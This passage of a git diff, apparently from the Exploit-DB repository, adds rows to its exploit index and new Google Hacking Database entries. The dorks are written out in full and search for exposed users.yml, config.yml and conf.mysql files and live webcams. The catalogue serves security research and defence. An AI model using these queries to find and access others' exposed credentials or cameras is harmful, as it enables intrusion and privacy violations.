Inclusion",2007-03-29,K-159,webapps,php,,2007-03-28,,1,OSVDB-34626;CVE-2007-1787,,,,,http://advisories.echo.or.id/adv/adv80-K-159-2007.txt +51404,exploits/php/webapps/51404.sh,"SoftExpert (SE) Suite v2.1.3 - Local File Inclusion",2023-05-02,"Felipe Alcantara",webapps,php,,2023-05-02,2023-05-02,0,CVE-2023-30330,,,,, 44981,exploits/php/webapps/44981.txt,"SoftExpert Excellence Suite 2.0 - 'cddocument' SQL Injection",2018-07-05,"Seren PORSUK",webapps,php,80,2018-07-05,2018-07-05,0,,"SQL Injection (SQLi)",,,, 39189,exploits/php/webapps/39189.txt,"Softmatica SMART iPBX - Multiple SQL Injections",2014-05-19,AtT4CKxT3rR0r1ST,webapps,php,,2014-05-19,2016-01-07,1,OSVDB-107114,,,,,https://www.securityfocus.com/bid/67465/info 17209,exploits/php/webapps/17209.txt,"SoftMP3 - SQL Injection",2011-04-24,mArTi,webapps,php,,2011-04-24,2011-04-24,0,,,,,, @@ -39069,6 +39083,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 40995,exploits/windows/local/40995.txt,"Advanced Desktop Locker 6.0.0 - Lock Screen Bypass",2017-01-08,Squnity,local,windows,,2017-01-08,2017-01-08,1,,,,,http://www.exploit-db.comADL-Trial-Setup.zip, 46561,exploits/windows/local/46561.py,"Advanced Host Monitor 11.92 beta - Local Buffer Overflow",2019-03-19,"Peyman Forouzan",local,windows,,2019-03-19,2019-03-19,0,,Local,,,http://www.exploit-db.comhm1192.exe, 46561,exploits/windows/local/46561.py,"Advanced Host Monitor 11.92 beta - Local Buffer Overflow",2019-03-19,"Peyman Forouzan",local,windows,,2019-03-19,2019-03-19,0,,"Buffer Overflow",,,http://www.exploit-db.comhm1192.exe, +51412,exploits/windows/local/51412.txt,"Advanced Host Monitor v12.56 - Unquoted Service Path",2023-05-02,"Mr Empy",local,windows,,2023-05-02,2023-05-02,0,,,,,, 49049,exploits/windows/local/49049.txt,"Advanced System Care Service 13 - 'AdvancedSystemCareService13' Unquoted Service Path",2020-11-16,"Jair Amezcua",local,windows,,2020-11-16,2020-11-16,0,,,,,, 47905,exploits/windows/local/47905.txt,"Advanced System Repair Pro 1.9.1.7 - Insecure File Permissions",2020-01-13,ZwX,local,windows,,2020-01-13,2020-04-13,1,,,,,, 35503,exploits/windows/local/35503.rb,"Advantech AdamView 4.30.003 - '.gni' Local Buffer Overflow (SEH)",2014-12-09,"Muhamad Fadzil Ramli",local,windows,,2014-12-10,2014-12-10,0,CVE-2014-8386;OSVDB-114843,,,,, @@ -40611,6 +40626,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 47510,exploits/windows/local/47510.txt,"Mikogo 5.2.2.150317 - 'Mikogo-Service' Unquoted Serive Path",2019-10-16,cakes,local,windows,,2019-10-16,2019-10-16,0,,,,,http://www.exploit-db.commikogo-starter.exe, 43033,exploits/windows/local/43033.py,"Mikogo 5.4.1.160608 - Local Credentials Disclosure",2017-10-23,LiquidWorm,local,windows,,2017-10-24,2017-10-24,0,,,,,, 50558,exploits/windows/local/50558.txt,"MilleGPG5 5.7.2 Luglio 2021 - Local Privilege Escalation",2021-12-01,"Alessandro Salzano",local,windows,,2021-12-01,2021-12-01,0,,,,,, +51410,exploits/windows/local/51410.txt,"MilleGPG5 5.9.2 (Gennaio 2023) - Local Privilege Escalation / Incorrect Access Control",2023-05-02,"Andrea Intilangelo",local,windows,,2023-05-02,2023-05-02,0,CVE-2023-25438,,,,, 9618,exploits/windows/local/9618.py,"Millenium MP3 Studio - '.pls' / '.mpf' / '.m3u' Universal Local Buffer Overflow (SEH)",2009-09-09,hack4love,local,windows,,2009-09-08,,1,OSVDB-56574,,,,http://www.exploit-db.commillennium1.exe, 9298,exploits/windows/local/9298.pl,"Millenium MP3 Studio 1.0 - '.mpf' Local Stack Overflow (2)",2009-07-30,corelanc0d3r,local,windows,,2009-07-29,,1,,,,,, 11191,exploits/windows/local/11191.pl,"Millenium MP3 Studio 1.x - '.m3u' Local Stack Overflow",2010-01-19,NeoCortex,local,windows,,2010-01-18,,1,,,,,http://www.exploit-db.commillennium1.exe, diff --git a/ghdb.xml b/ghdb.xml index b87553f3e..23dd00e2b 100644 --- a/ghdb.xml +++ b/ghdb.xml @@ -45438,6 +45438,21 @@ Author: Abhi Chitkara 2020-05-07 Alexandros Pappas + + 8174 + https://www.exploit-db.com/ghdb/8174 + Files Containing Juicy Info + intitle:"index of" "users.yml" | "admin.yml" | "config.yml" + # Google Dork: intitle:"index of" "users.yml" | "admin.yml" | "config.yml" +# Files Containing Juicy Info +# Date:02/05/2023 +# Exploit Author: Mohammed A.Siledar + Google dork submission: intitle:"index of" "users.yml" | "admin.yml" | "config.yml" + https://www.google.com/search?q=Google dork submission: intitle:"index of" "users.yml" | "admin.yml" | "config.yml" + + 2023-05-02 + Mohammed A.Siledar + 6176 https://www.exploit-db.com/ghdb/6176 @@ -48397,6 +48412,21 @@ It contains key username and password text sensitive information. 2021-10-25 Ramjan Ali Sabber + + 8171 + https://www.exploit-db.com/ghdb/8171 + Files Containing Juicy Info + intitle:index.of conf.mysql + # Google Dork: intitle:index.of conf.mysql +# Files Containing Juicy Info +# Date:02/05/2023 +# Exploit Author: Ramjan Ali Sabber + Re: GHDB Dork + https://www.google.com/search?q=Re: GHDB Dork + + 2023-05-02 + Ramjan Ali Sabber + 111 https://www.exploit-db.com/ghdb/111 @@ -48651,6 +48681,21 @@ Author: Lord.TMR 2023-01-31 Insha Ahsan Raj + + 8173 + https://www.exploit-db.com/ghdb/8173 + Files Containing Juicy Info + inurl: "/wp-content/uploads" + # Google Dork: inurl: "/wp-content/uploads" +# Files Containing Juicy Info +# Date:02/05/2023 +# Exploit Author: Andrew Gimenez + inurl: "/wp-content/uploads" + https://www.google.com/search?q=inurl: "/wp-content/uploads" + + 2023-05-02 + Andrew Gimenez + 8115 https://www.exploit-db.com/ghdb/8115 @@ -101600,6 +101645,21 @@ Website: (https://the-infosec.com) 2018-12-17 Alfie + + 8172 + https://www.exploit-db.com/ghdb/8172 + Various Online Devices + intitle: "webcam" site: "live" + # Google Dork: intitle: "webcam" site: "live" +# Various Online Devices +# Date:02/05/2023 +# Exploit Author: Ramjan Ali Sabber + Re: GHDB - Dork + https://www.google.com/search?q=Re: GHDB - Dork + + 2023-05-02 + Ramjan Ali Sabber + 7599 https://www.exploit-db.com/ghdb/7599